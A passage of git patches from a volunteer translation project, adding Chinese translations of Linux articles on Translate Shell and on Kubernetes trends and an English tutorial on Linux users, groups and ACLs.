'link2.file.txt': Invalid cross-device link ``` -Why does this error occur? The reason is each separate mountable filesystem has its own set of inode numbers. Simply referring to a file by an inode number across the entire Linux directory structure can result in confusion because the same inode number can exist in each mounted filesystem. +为什么会出现这个错误呢? 原因是每一个单独的挂载文件系统都有一套自己的节点号。 Simply referring to a file by an inode number across the entire Linux directory structure can result in confusion because the same inode number can exist in each mounted filesystem. There may be a time when you will want to locate all the hard links that belong to a single inode. You can find the inode number using the **ls -li** command. Then you can use the **find** command to locate all links with that inode number. From 178125fa2fafecc27a5c1d808151434541b7f797 Mon Sep 17 00:00:00 2001 From: DarkSun Date: Sun, 3 Dec 2017 00:44:46 +0800 Subject: [PATCH 0137/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= =?UTF-8?q?=20(#6416)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * translated * moved to translated directory --- ...ogle Translate From Command Line In Linux.md | 90 ++++++++++--------- 1 file changed, 46 insertions(+), 44 deletions(-) rename {sources => translated}/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md (75%) diff --git a/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md b/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md similarity index 75% rename from sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md rename to translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md index 3725fea5df..9f905bd496 100644 --- a/sources/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md +++ b/translated/tech/20171130 Translate Shell – A Tool To Use Google Translate From Command Line In Linux.md @@ -1,82 +1,82 @@ -translate by darksun -Translate Shell – A Tool To Use Google Translate From Command Line In Linux +Translate Shell: 一款在 Linux 命令行中使用 Google Translate的工具 ============================================================ -I love to work and share about CLI apps since i’m very much interested on CLI applications. Basically i prefer CLI because most of the time i will be sitting in front of the black screen and it’s became habit for me to go with CLI apps instead of GUI. +我对 CLI 应用非常感兴趣,因此热衷于使用并分享 CLI 应用。 我之所以更喜欢 CLI 很大原因是因为我在大多数的时候都使用的是字符界面(black screen),已经习惯了使用 CLI 应用而不是 GUI 应用. -We have wrote many articles about CLI applications in past. Recently i came to know about google CLI utilities such as “Google Translator”, “Google Calendar”, and “Google Contacts”. so, i just want to share about it. +我写过很多关于 CLI 应用的文章。 最近我发现了一些 google 的 CLI 工具,像 “Google Translator”, “Google Calendar”, 和 “Google Contacts”。 这里,我想在给大家分享一下。 -Today we are going to discuss about “Google Translator”. I use many times in a day to know the meanings since my native language is Tamil. +今天我们要介绍的是 “Google Translator” 工具。 由于母语是泰米尔语,我在一天内用了很多次才理解了它的意义。 -Google translate is widely used by other language speakers. +`Google translate` 为其他语系的人们所广泛使用。 -#### What is Translate Shell +### 什么是 Translate Shell -[Translate Shell][2] (formerly known as Google Translate CLI) is a command-line translator powered by Google Translate (default), Bing Translator, Yandex.Translate and Apertium. It allows you to access to one of these translation engines right from your terminal. Translate Shell is designed work on most of the Linux distributions. +[Translate Shell][2] (之前叫做 Google Translate CLI) 是一款借助 `Google Translate`(默认), `Bing Translator`, `Yandex.Translate` 以及 `Apertium` 来翻译的命令行翻译器。 +它让你可以在终端访问这些翻译引擎. `Translate Shell` 在大多数Linux发行版中都能使用。 -#### How to Install Translate Shell +### 如何安装 Translate Shell -We can install the Translate Shell application in three methods. +有三种方法安装 `Translate Shell`。 -* Download self-contained executable file +* 下载自包含的可执行文件 -* Manual Method +* 手工安装 -* Via Package Manager +* 通过包挂力气安装 -#### Method-1 : Download self-contained executable file +#### 方法-1 : 下载自包含的可执行文件 -Just Download the self-contained executable file and move into /usr/bin directory. +下载自包含的可执行文件放到 `/usr/bin` 目录中。 -``` +```shell $ wget git.io/trans $ chmod +x ./trans $ sudo mv trans /usr/bin/ ``` -#### Method-2 : Manual Method +#### 方法-2 : 手工安装 -Just clone the Translate Shell github repository and compile manually for any distributions. +克隆 `Translate Shell` github 仓库然后手工编译。 -``` +```shell $ git clone https://github.com/soimort/translate-shell && cd translate-shell $ make $ sudo make install ``` -#### Method-3 : Via Package Manager +#### 方法-3 : Via Package Manager -Translate Shell is available in few of the distribution official repository that can be installed through package manager. +有些发行版的官方仓库中包含了 `Translate Shell`,可以通过包管理器来安装。 -For Debian/Ubuntu, use [APT-GET Command][3] or [APT Command][4]to install Translate Shell. +对于 Debian/Ubuntu, 使用 [APT-GET Command][3] 或者 [APT Command][4]来安装。 -``` +```shell $ sudo apt-get install translate-shell ``` -For Fedora, use [DNF Command][5] to install Translate Shell. +对于 Fedora, 使用 [DNF Command][5] 来安装。 -``` +```shell $ sudo dnf install translate-shell ``` -For Arch Linux based systems, use [Yaourt Command][6] or [Packer Command][7] to install Translate Shell from AUR repository. +对于基于 Arch Linux 的系统, 使用 [Yaourt Command][6] 或 [Packer Command][7] 来从 AUR 仓库中安装。 -``` +```shell $ yaourt -S translate-shell or $ packer -S translate-shell ``` -#### How To Use Translate Shell +### 如何使用 Translate Shell -After successfully installed, open your terminal and fire the following command. Google Translate can identify the language of the source text automatically, and Translate Shell by default translates the source text into the language of your locale. +安装好后,打开终端闭关输入下面命令。 `Google Translate` 会自动探测源文本是哪种语言,并且在默认情况下将之翻译成你的 `locale` 所对应的语言。 ``` $ trans [Words] ``` -I’m going to translated a Tamil word “நன்றி” (Nanri) to English. It’s use to thank people. +下面我将泰米尔语中的单词 “நன்றி” (Nanri) 翻译成英语。 这个单词的意思是感谢别人。 ``` $ trans நன்றி @@ -98,7 +98,7 @@ noun Thanks ``` -Alternatively translate a word into Tamil using following command. +使用下面命令也能将英语翻译成泰米尔语。 ``` $ trans :ta thanks @@ -119,7 +119,7 @@ thanks நன்றி ``` -To Translate a word into more than one language use following command (In this example, i’m going to translate a word into Tamil & Hindi). +要将一个单词翻译到多个语种可以使用下面命令(本例中, 我将单词翻译成泰米尔语以及印地语)。 ``` $ trans :ta+hi thanks @@ -156,7 +156,7 @@ thanks धन्यवाद, शुक्रिया ``` -To Translate words into one argument (phrase) use following command (just quote the sentence into one argument). +使用下面命令可以将多个单词当成一个参数(句子)来进行翻译。(只需要把句子应用起来作为一个参数就行了)。 ``` $ trans :ta "what is going on your life?" @@ -172,7 +172,7 @@ what is going on your life? உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? ``` -To Translate Translate each word alone. +下面命令独立地翻译各个单词。 ``` $ trans :ta curios happy @@ -208,14 +208,14 @@ happy சந்தோஷமாக, மகிழ்ச்சி, இனிய, சந்தோஷமா ``` -Brief Mode : By default, Translate Shell displays translations in a verbose manner. If you prefer to see only the brief information, just add -b option. +简洁模式: 默认情况下,`Translate Shell` 尽可能多的显示翻译信息. 如果你希望只显示简要信息,只需要加上`-b`选项。 ``` $ trans -b :ta thanks நன்றி ``` -Dictionary Mode : To use Translate Shell as a dictionary, just add -d option. +字典模式: 加上 `-d` 可以把 `Translate Shell` 当成字典来用. ``` $ trans -d :en thanks @@ -294,14 +294,14 @@ See also Thanks!, thank, many thanks, thanks to, thanks to you, special thanks, give thanks, thousand thanks, Many thanks!, render thanks, heartfelt thanks, thanks to this ``` -To Translate a File using Translate Shell, use the following format. +使用下面格式可以使用 `Translate Shell` 来翻译文件。 -``` +```shell $ trans :ta file:///home/magi/gtrans.txt உங்கள் வாழ்க்கையில் என்ன நடக்கிறது? ``` -To open interactive Translate Shell, run the following command. Make sure you have to specify the source language and the target language(s) before starting an interactive shell. In this example, i’m going to translate a word from English to Tamil. +下面命令可以让 `Translate Shell` 进入交互模式. 在进入交互模式之前你需要明确指定源语言和目标语言。本例中,我将英文单词翻译成泰米尔语。 ``` $ trans -shell en:ta thanks @@ -324,11 +324,13 @@ thanks நன்றி ``` -To know the language code, just fire the following command. +想知道语言代码,可以执行下面语言。 -``` +```shell $ trans -R -or +``` +或者 +```shell $ trans -T ┌───────────────────────┬───────────────────────┬───────────────────────┐ │ Afrikaans - af │ Hindi - hi │ Punjabi - pa │ @@ -373,9 +375,9 @@ $ trans -T └───────────────────────┴───────────────────────┴───────────────────────┘ ``` -To know more options, navigate to man page. +想了解更多选项的内容,可以查看 `man` 页. -``` +```shell $ man trans ``` From 85b20be1408b3360505dda47d15010362a9d110a Mon Sep 17 00:00:00 2001 From: yunfengHe Date: Sun, 3 Dec 2017 00:45:54 +0800 Subject: [PATCH 0138/1627] -Containers and Kubernetes: What's next? Translated by YunfengHe (#6417) * translated by yunfengHe * translated, modified * modified v2 * modified v3 * modified yunfengHe final * translated yunfengHe --- ...20 Containers and Kubernetes Whats next.md | 98 ------------------- ...20 Containers and Kubernetes Whats next.md | 80 +++++++++++++++ 2 files changed, 80 insertions(+), 98 deletions(-) delete mode 100644 sources/tech/20171120 Containers and Kubernetes Whats next.md create mode 100644 translated/tech/20171120 Containers and Kubernetes Whats next.md diff --git a/sources/tech/20171120 Containers and Kubernetes Whats next.md b/sources/tech/20171120 Containers and Kubernetes Whats next.md deleted file mode 100644 index b73ccb21c2..0000000000 --- a/sources/tech/20171120 Containers and Kubernetes Whats next.md +++ /dev/null @@ -1,98 +0,0 @@ -YunfengHe Translating -Containers and Kubernetes: What's next? -============================================================ - -### What's ahead for container orchestration and Kubernetes? Here's an expert peek - -![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") - -If you want a basic idea of where containers are headed in the near future, follow the money. There’s a lot of it: 451 Research projects that the overall market for containers will hit roughly [$2.7 billion in 2020][4], a 3.5-fold increase from the $762 million spent on container-related technology in 2016. - -There’s an obvious fundamental factor behind such big numbers: Rapidly increasing containerization. The parallel trend: As container adoption grows, so will container  _orchestration_  adoption. - -As recent survey data from  [_The New Stack_][5]  indicates, container adoption is the most significant catalyst of orchestration adoption: 60 percent of respondents who’ve deployed containers broadly in production report they’re also using Kubernetes widely in production. Another 19 percent of respondents with broad container deployments in production were in the initial stages of broad Kubernetes adoption. Meanwhile, just 5 percent of those in the initial phases of deploying containers in production environments were using Kubernetes broadly – but 58 percent said they were preparing to do so. It’s a chicken-and-egg relationship. - - -Most experts agree that an orchestration tool is essential to the scalable [long-term management of containers][6] – and corresponding developments in the marketplace. “The next trends in container orchestration are all focused on broadening adoption,” says Alex Robinson, software engineer at [Cockroach Labs][7]. - -This is a quickly shifting landscape, one that is just starting to realize its future potential. So we checked in with Robinson and other practitioners to get their boots-on-the-ground perspective on what’s next in container orchestration – and for Kubernetes itself. - -### **Container orchestration shifts to mainstream** - -We’re at the precipice common to most major technology shifts, where we transition from the careful steps of early adoption to cliff-diving into commonplace use. That will create new demand for the plain-vanilla requirements that make mainstream adoption easier, especially in large enterprises. - -“The gold rush phase of early innovation has slowed down and given way to a much stronger focus on stability and usability,” Robinson says. “This means we'll see fewer major announcements of new orchestration systems, and more security options, management tools, and features that make it easier to take advantage of the flexibility already inherent in the major orchestration systems.” - -### **Reduced complexity** - -On a related front, expect an intensifying effort to cut back on the complexity that some organizations face when taking their first plunge into container orchestration. As we’ve covered before, deploying a container might be “easy,” but [managing containers long-term ][8]requires more care. - -“Today, container orchestration is too complex for many users to take full advantage,” says My Karlsson, developer at [Codemill AB][9]. “New users are often struggling just to get single or small-size container configurations running in isolation, especially when applications are not originally designed for it. There are plenty of opportunities to simplify the orchestration of non-trivial applications and make the technology more accessible.” - -### **Increasing focus on hybrid cloud and multi-cloud** - -As adoption of containers and container orchestration grows, more organizations will scale from a starting point of, say, running non-critical workloads in a single environment to more [complex use cases][10] across multiple environments. For many companies, that will mean managing containerized applications (and particularly containerized microservices) across [hybrid cloud][11] and [multi-cloud][12] environments, often globally. - -"Containers and Kubernetes have made hybrid cloud and application portability a reality,” says [Brian Gracely][13], director of [Red Hat][14] OpenShift product strategy. “Combined with the Open Service Broker, we expect to see an explosion of new applications that combine private and public cloud resources." - -“I believe that federation will get a push, enabling much-wanted features such as seamless multi-region and multi-cloud deployments,” says Carlos Sanchez, senior software engineer at [CloudBees][15].  - -**[ Want CIO wisdom on hybrid cloud and multi-cloud strategy? See our related resource, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** - -### **Continued consolidation of platforms and tools** - -Technology consolidation is common trend; container orchestration is no exception. - -“As containerization goes mainstream, engineers are consolidating on a very small number of technologies to run their [microservices and] containers and Kubernetes will become the dominant container orchestration platform, far outstripping other platforms,” says Ben Newton, analytics lead at [Sumo Logic][17]. “Companies will adopt Kubernetes to drive a cloud-neutral approach as Kubernetes provides a reasonably clear path to reduce dependence on [specific] cloud ecosystems.**”** - -### **Speaking of Kubernetes, what’s next?** - -"Kubernetes is here for the long haul, and the community driving it is doing great job – but there's lots ahead,” says Gadi Naor, CTO and co-founder of [Alcide][18]. Our experts shared several predictions specific to [the increasingly popular Kubernetes platform][19]:  - - **_Gadi Naor at Alcide:_**  “Operators will continue to evolve and mature, to a point where applications running on Kubernetes will become fully self-managed. Deploying and monitoring microservices on top of Kubernetes with [OpenTracing][20] and service mesh frameworks such as [istio][21] will help shape new possibilities.” - - **_Brian Gracely at Red Hat:_**  “Kubernetes continues to expand in terms of the types of applications it can support. When you can run traditional applications, cloud-native applications, big data applications, and HPC or GPU-centric applications on the same platform, it unlocks a ton of architectural flexibility.” - - **_Ben Newton at Sumo Logic: _ “**As Kubernetes becomes more dominant, I would expect to see more normalization of the operational mechanisms – particularly integrations into third-party management and monitoring platforms.” - - **_Carlos Sanchez at CloudBees: _** “In the immediate future there is the ability to run without Docker, using other runtimes...to remove any lock-in. [Editor’s note: [CRI-O][22], for example, offers this ability.] “Also, [look for] storage improvements to support enterprise features like data snapshotting and online volume resizing.” - - - **_Alex Robinson at Cockroach Labs: _ “**One of the bigger developments happening in the Kubernetes community right now is the increased focus on managing [stateful applications][23]. Managing state in Kubernetes right now is very difficult if you aren't running in a cloud that offers remote persistent disks, but there's work being done on multiple fronts [both inside Kubernetes and by external vendors] to improve this.” - --------------------------------------------------------------------------------- - -via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next - -作者:[Kevin Casey ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://enterprisersproject.com/user/kevin-casey -[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats -[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity -[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ -[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf -[5]:https://thenewstack.io/ -[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[7]:https://www.cockroachlabs.com/ -[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul -[9]:https://codemill.se/ -[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA -[11]:https://enterprisersproject.com/hybrid-cloud -[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference -[13]:https://enterprisersproject.com/user/brian-gracely -[14]:https://www.redhat.com/en -[15]:https://www.cloudbees.com/ -[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ -[17]:https://www.sumologic.com/ -[18]:http://alcide.io/ -[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english -[20]:http://opentracing.io/ -[21]:https://istio.io/ -[22]:http://cri-o.io/ -[23]:https://opensource.com/article/17/2/stateful-applications -[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 -[25]:https://enterprisersproject.com/user/kevin-casey diff --git a/translated/tech/20171120 Containers and Kubernetes Whats next.md b/translated/tech/20171120 Containers and Kubernetes Whats next.md new file mode 100644 index 0000000000..5ed099c170 --- /dev/null +++ b/translated/tech/20171120 Containers and Kubernetes Whats next.md @@ -0,0 +1,80 @@ +容器技术和 k8s 的下一站: +============================================================ +### 想知道容器编排管理和 K8s 的最新展望么?来看看专家怎么说。 + +![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") + +如果你想对容器在未来的发展方向有一个整体把握,那么你一定要跟着钱走,看看钱都投在了哪里。当然了,有很多很多的钱正在投入容器的进一步发展。相关研究预计 2020 年容器技术的投入将占有 [27 亿美元][4] 的市场份额 。而在 2016 年,容器相关技术投入的总额为 7.62 亿美元,只有 2020 年投入预计的三分之一。巨额投入的背后是一些显而易见的基本因素,包括容器化的迅速增长以及并行化的大趋势。随着容器被大面积推广和使用,容器编排管理也会被理所当然的推广应用起来。 + +来自 [_The new stack_][5] 的调研数据表明,容器的推广使用是编排管理被推广的主要的催化剂。根据调研参与者的反馈数据,在已经将容器技术使用到生产环境中的使用者里,有六成正在将 kubernetes(k8s)编排管理广泛的应用在生产环境中,另外百分之十九的人员则表示他们已经处于部署 k8s 的初级阶段。在容器部署初期的使用者当中,虽然只有百分之五的人员表示已经在使用 K8s ,但是百分之五十八的人员表示他们正在计划和准备使用 K8s。总而言之,容器和 Kuebernetes 的关系就好比是鸡和蛋一样,相辅相成紧密关联。众多专家一致认为编排管理工具对容器的[长周期管理][6] 以及其在市场中的发展有至关重要的作用。正如 [Cockroach 实验室][7] 的 Alex Robinson 所说,容器编排管理被更广泛的拓展和应用是一个总体的大趋势。毫无疑问,这是一个正在快速演变的领域,且未来潜力无穷。鉴于此,我们对罗宾逊和其他的一些容器的实际使用和推介者做了采访,来从他们作为容器技术的践行者的视角上展望一下容器编排以及 k8s 的下一步发展。 + +### **容器编排将被主流接受** + +像任何重要技术的转型一样,我们就像是处在一个高崖之上一般,在经过了初期步履蹒跚的跋涉之后将要来到一望无际的广袤平原。广大的新天地和平实真切的应用需求将会让这种新技术在主流应用中被迅速推广,尤其是在大企业环境中。正如 Alex Robinson 说的那样,容器技术的淘金阶段已经过去,早期的技术革新创新正在减速,随之而来的则是市场对容器技术的稳定性和可用性的强烈需求。这意味着未来我们将不会再见到大量的新的编排管理系统的涌现,而是会看到容器技术方面更多的安全解决方案,更丰富的管理工具,以及基于目前主流容器编排系统的更多的新特性。 + +### **更好的易用性** + +人们将在简化容器的部署方面下大功夫,因为容器部署的初期工作对很多公司和组织来说还是比较复杂的,尤其是容器的[长期管理维护][8]更是需要投入大量的精力。正如 [Codemill AB][9] 公司的 My Karlsson 所说,容器编排技术还是太复杂了,这导致很多使用者难以娴熟驾驭和充分利用容器编排的功能。很多容器技术的新用户都需要花费很多精力,走很多弯路,才能搭建小规模的,单个的,被隔离的容器系统。这种现象在那些没有针对容器技术设计和优化的应用中更为明显。在简化容器编排管理方面有很多优化可以做,这些优化和改造将会使容器技术更加具有可用性。 + +### **在 hybrid cloud 以及 multi-cloud 技术方面会有更多侧重** + +随着容器和容器编排技术被越来越多的使用,更多的组织机构会选择扩展他们现有的容器技术的部署,从之前的把非重要系统部署在单一环境的使用情景逐渐过渡到更加[复杂的使用情景][10]。对很多公司来说,这意味着他们必须开始学会在 [hybrid cloud][11] 和 [muilti-cloud][12] 的环境下,全局化的去管理那些容器化的应用和微服务。正如红帽 [Openshift 部门产品战略总监][14] [Brian Gracely][13] 所说,容器和 k8s 技术的使用使得我们成功的实现了混合云以及应用的可移植性。结合 Open Service Broker API 的使用,越来越多的结合私有云和公有云资源的新应用将会涌现出来。 +据 [CloudBees][15] 公司的高级工程师 Carlos Sanchez 分析,联合服务(Federation)将会得到极大推动,使一些诸如多地区部署和多云部署等的备受期待的新特性成为可能。 + +**[ 想知道 CIO 们对 hybrid cloud 和 multi cloud 的战略构想么? 请参看我们的这条相关资源, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** + +### **平台和工具的持续整合及加强** + +对任何一种科技来说,持续的整合和加强从来都是大势所趋; 容器编排管理技术在这方面也不例外。来自 [Sumo Logic][17] 的首席分析师 Ben Newton 表示,随着容器化渐成主流,软件工程师们正在很少数的一些技术上做持续整合加固的工作,来满足他们的一些微应用的需求。容器和 K8s 将会毫无疑问的成为容器编排管理方面的主流平台,并轻松碾压其他的一些小众平台方案。因为 K8s 提供了一个相当清晰的可以摆脱各种特有云生态的途径,K8s 将被大量公司使用,逐渐形成一个不依赖于某个特定云服务的“中立云”(cloud-neutral)。 + +### **K8s 的下一站** + +来自 [Alcide][18] 的 CTO 和联合创始人 Gadi Naor 表示,k8s 将会是一个有长期和远景发展的技术,虽然我们的社区正在大力推广和发展 k8s,k8s 仍有很长的路要走。 +专家们对[日益流行的 k8s 平台][19]也作出了以下一些预测: + +**_来自 Alcide 的 Gadi Naor 表示:_** “运营商会持续演进并趋于成熟,直到在 k8s 上运行的应用可以完全自治。利用 [OpenTracing][20] 和诸如 [istio][21] 技术的 service mesh 架构,在 k8s 上部署和监控微应用将会带来很多新的可能性。” + +**_来自 Red Hat 的 Brian Gracely 表示:_** “k8s 所支持的应用的种类越来越多。今后在 k8s 上,你不仅可以运行传统的应用程序,还可以运行原生的云应用,大数据应用以及 HPC 或者基于 GPU 运算的应用程序,这将为灵活的架构设计带来无限可能。” + +**_来自 Sumo Logic 的 Ben Newton 表示:_** “随着 k8s 成为一个具有统治地位的平台,我预计更多的操作机制将会被统一化,尤其是 k8s 将和第三方管理和监控平台融合起来。” + +**_来自 CloudBees 的 Carlos Sanchez 表示:_** “在不久的将来我们就能看到不依赖于 Docker 而使用其他运行时环境的系统,这将会有助于消除任何可能的 lock-in 情景“ [小编提示:[CRI-O][22] 就是一个可以借鉴的例子。]“而且我期待将来会出现更多的针对企业环境的存储服务新特性,包括数据快照以及在线的磁盘容量的扩展。” + +**_来自 Cockroach Labs 的 Alex Robinson 表示:_** “ k8s 社区正在讨论的一个重大发展议题就是加强对[有状态程序][23]的管理。目前在 k8s 平台下,实现状态管理仍然非常困难,除非你所使用的云服务商可以提供远程固定磁盘。现阶段也有很多人在多方面试图改善这个状况,包括在 k8s 平台内部以及在外部服务商一端做出的一些改进。” + +------------------------------------------------------------------------------- + +via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next + +作者:[Kevin Casey ][a] +译者:[yunfengHe](https://github.com/yunfengHe) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://enterprisersproject.com/user/kevin-casey +[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats +[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity +[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ +[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf +[5]:https://thenewstack.io/ +[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[7]:https://www.cockroachlabs.com/ +[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[9]:https://codemill.se/ +[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA +[11]:https://enterprisersproject.com/hybrid-cloud +[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference +[13]:https://enterprisersproject.com/user/brian-gracely +[14]:https://www.redhat.com/en +[15]:https://www.cloudbees.com/ +[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ +[17]:https://www.sumologic.com/ +[18]:http://alcide.io/ +[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english +[20]:http://opentracing.io/ +[21]:https://istio.io/ +[22]:http://cri-o.io/ +[23]:https://opensource.com/article/17/2/stateful-applications +[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 +[25]:https://enterprisersproject.com/user/kevin-casey From 21881aecbca4e83e6cf1e1257c73ea3bff8b2a19 Mon Sep 17 00:00:00 2001 From: qhwdw <33189910+qhwdw@users.noreply.github.com> Date: Sun, 3 Dec 2017 10:47:25 +0800 Subject: [PATCH 0139/1627] =?UTF-8?q?20171203=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ow to Manage Users with Groups in Linux.md | 166 ++++++++++++++++++ 1 file changed, 166 insertions(+) create mode 100644 sources/tech/20171201 How to Manage Users with Groups in Linux.md diff --git a/sources/tech/20171201 How to Manage Users with Groups in Linux.md b/sources/tech/20171201 How to Manage Users with Groups in Linux.md new file mode 100644 index 0000000000..1ab98d864a --- /dev/null +++ b/sources/tech/20171201 How to Manage Users with Groups in Linux.md @@ -0,0 +1,166 @@ +How to Manage Users with Groups in Linux +============================================================ + +### [group-of-people-1645356_1920.jpg][1] + +![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/group-of-people-1645356_1920.jpg?itok=rJlAxBSV) + +Learn how to work with users, via groups and access control lists in this tutorial. + +[Creative Commons Zero][4] + +Pixabay + +When you administer a Linux machine that houses multiple users, there might be times when you need to take more control over those users than the basic user tools offer. This idea comes to the fore especially when you need to manage permissions for certain users. Say, for example, you have a directory that needs to be accessed with read/write permissions by one group of users and only read permissions for another group. With Linux, this is entirely possible. To make this happen, however, you must first understand how to work with users, via groups and access control lists (ACLs). + +We’ll start from the beginning with users and work our way to the more complex ACLs. Everything you need to make this happen will be included in your Linux distribution of choice. We won’t touch on the basics of users, as the focus on this article is about groups. + +For the purpose of this piece, I’m going to assume the following: + +You need to create two users with usernames: + +* olivia + +* nathan + +You need to create two groups: + +* readers + +* editors + +Olivia needs to be a member of the group editors, while nathan needs to be a member of the group readers. The group readers needs to only have read permission to the directory /DATA, whereas the group editors needs to have both read and write permission to the /DATA directory. This, of course, is very minimal, but it will give you the basic information you need to expand the tasks to fit your much larger needs. + +I’ll be demonstrating on the Ubuntu 16.04 Server platform. The commands will be universal—the only difference would be if your distribution of choice doesn’t make use of sudo. If this is the case, you’ll have to first su to the root user to issue the commands that require sudo in the demonstrations. + +### Creating the users + +The first thing we need to do is create the two users for our experiment. User creation is handled with the useradd command. Instead of just simply creating the users we need to create them both with their own home directories and then give them passwords. + +The first thing we do is create the users. To do this, issue the commands: + +``` +sudo useradd -m olivia + +sudo useradd -m nathan +``` + +Next each user must have a password. To add passwords into the mix, you’d issue the following commands: + +``` +sudo passwd olivia + +sudo passwd nathan +``` + +That’s it, your users are created. + +### Creating groups and adding users + +Now we’re going to create the groups readers and editors and then add users to them. The commands to create our groups are: + +``` +addgroup readers + +addgroup editors +``` + +### [groups_1.jpg][2] + +![groups](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/groups_1.jpg?itok=BKwL89BB) + +Figure 1: Our new groups ready to be used. + +[Used with permission][5] + +With our groups created, we need to add our users. We’ll add user nathan to group readers with the command: + +``` +sudo usermod -a -G readers nathan +``` + +``` +sudo usermod -a -G editors olivia +``` + +### Giving groups permissions to directories + +Let’s say you have the directory /READERS and you need to allow all members of the readers group access to that directory. First, change the group of the folder with the command: + +``` +sudo chown -R :readers /READERS +``` + +``` +sudo chmod -R g-w /READERS +``` + +``` +sudo chmod -R o-x /READERS +``` + +Let’s say you have the directory /EDITORS and you need to give members of the editors group read and write permission to its contents. To do that, the following command would be necessary: + +``` +sudo chown -R :editors /EDITORS + +sudo chmod -R g+w /EDITORS + +sudo chmod -R o-x /EDITORS +``` + +The problem with using this method is you can only add one group to a directory at a time. This is where access control lists come in handy. + +### Using access control lists + +Now, let’s get tricky. Say you have a single folder—/DATA—and you want to give members of the readers group read permission and members of the group editors read/write permissions. To do that, you must take advantage of the setfacl command. The setfacl command sets file access control lists for files and folders. + +The structure of this command looks like this: + +``` +setfacl OPTION X:NAME:Y /DIRECTORY +``` + +``` +sudo setfacl -m g:readers:rx -R /DATA +``` + +To give members of the editors group read/write permissions (while retaining read permissions for the readers group), we’d issue the command; + +``` +sudo setfacl -m g:editors:rwx -R /DATA +``` + +### All the control you need + +And there you have it. You can now add members to groups and control those groups’ access to various directories with all the power and flexibility you need. To read more about the above tools, issue the commands: + +* man usradd + +* man addgroup + +* man usermod + +* man sefacl + +* man chown + +* man chmod + +Learn more about Linux through the free ["Introduction to Linux" ][3]course from The Linux Foundation and edX. + +-------------------------------------------------------------------------------- + +via: https://www.linux.com/learn/intro-to-linux/2017/12/how-manage-users-groups-linux + +作者:[Jack Wallen ] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[1]:https://www.linux.com/files/images/group-people-16453561920jpg +[2]:https://www.linux.com/files/images/groups1jpg +[3]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux +[4]:https://www.linux.com/licenses/category/creative-commons-zero +[5]:https://www.linux.com/licenses/category/used-permission From e9da3afc7f91b3a6eb68755b06549b5824f0de54 Mon Sep 17 00:00:00 2001 From: darksun Date: Sun, 3 Dec 2017 10:50:32 +0800 Subject: [PATCH 0140/1627] 